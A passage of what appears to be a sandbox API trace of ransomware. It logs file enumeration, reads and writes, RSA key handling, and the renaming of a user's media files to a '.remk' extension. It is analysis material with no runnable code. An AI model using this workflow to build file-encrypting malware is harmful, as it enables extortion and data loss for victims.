[0234.131] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.131] CloseHandle (hObject=0x640) returned 1 [0234.132] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\3557nrWiSL8Oztuk2v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\3557nrwisl8oztuk2v.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\3557nrWiSL8Oztuk2v.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\3557nrwisl8oztuk2v.mp3.remk")) returned 1 [0234.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.133] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.134] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb748cc70, ftCreationTime.dwHighDateTime=0x1d5e137, ftLastAccessTime.dwLowDateTime=0x57370fc0, ftLastAccessTime.dwHighDateTime=0x1d5d9d7, ftLastWriteTime.dwLowDateTime=0x57370fc0, ftLastWriteTime.dwHighDateTime=0x1d5d9d7, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6E50reyJxYm.wav", cAlternateFileName="6E50RE~1.WAV")) returned 1 [0234.134] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\6E50reyJxYm.wav") returned=".wav" [0234.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\6E50reyJxYm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\6e50reyjxym.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.135] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=77472) returned 1 [0234.135] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.138] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12e7a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.138] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.139] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12ea0, lpOverlapped=0x0) returned 1 [0234.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.140] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.141] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.141] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.141] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.141] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.141] GetLastError () returned 0x0 [0234.141] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.141] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.141] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.141] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.141] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12ea0) returned 0x37c4278 [0234.142] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbf18 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee628 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbf60 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.142] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee688 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee670 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.143] GetCurrentThreadId () returned 0x314 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2b00 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.144] GetCurrentThreadId () returned 0x314 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee700 [0234.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6a0 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbf60 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.148] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x12e9b, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x12e9b, lpOverlapped=0x0) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.148] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.148] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.148] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: 